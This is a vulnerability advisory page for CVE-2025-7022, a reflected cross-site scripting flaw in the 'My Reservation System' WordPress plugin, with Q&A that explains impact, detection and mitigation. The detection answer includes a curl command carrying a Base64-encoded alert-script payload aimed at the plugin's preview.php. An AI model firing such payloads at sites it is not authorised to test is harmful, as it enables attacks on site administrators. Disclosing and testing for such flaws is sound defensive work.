CVE-2025-7022
BaseFortify
Publication date: 2025-07-25
Last updated on: 2025-07-25
Assigner: WPScan
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| my_reservation_system | my_reservation_system | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7022 is a reflected Cross-Site Scripting (XSS) vulnerability in the WordPress plugin "My Reservation System" up to version 2.3. The plugin does not properly sanitize and escape a parameter called 'val' in the preview.php script before outputting it back on the page. This parameter accepts Base64-encoded input which is decoded and executed without validation. An attacker can craft a malicious URL containing a Base64-encoded payload that executes arbitrary JavaScript code in the browser of a user who visits the URL, such as an administrator. This can lead to unauthorized actions or data theft via script execution. [1]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to execute arbitrary JavaScript code in the browsers of high-privilege users like administrators. This can lead to session hijacking, theft of sensitive information, unauthorized actions on the website, or further exploitation of the system. Since the attack is reflected, it requires the victim to visit a crafted URL, potentially leading to compromise of administrative control or data. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the 'val' parameter in the 'preview.php' script of the My Reservation System WordPress plugin for reflected Cross-Site Scripting (XSS). You can craft a URL with a Base64-encoded payload and observe if the payload is executed when accessed by a user. For example, you can use curl or wget to send requests with Base64-encoded input in the 'val' parameter and check the response for reflected scripts. A sample command to test might be: curl -i 'http://your-site.com/wp-content/plugins/my-reservation-system/preview.php?val=PHNjcmlwdD5hbGVydCgndGVzdG40Jyk8L3NjcmlwdD4=' (which is a Base64-encoded alert script). If the script is reflected and executed in the browser, the vulnerability exists. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable 'preview.php' script, especially for high privilege users such as administrators, by using web application firewall (WAF) rules or access controls. Avoid clicking on suspicious URLs containing Base64-encoded parameters in the 'val' parameter. Monitor and educate users about the risk of reflected XSS attacks. Since there is currently no known fix for this vulnerability, consider disabling or removing the My Reservation System plugin until a patch is released. [1]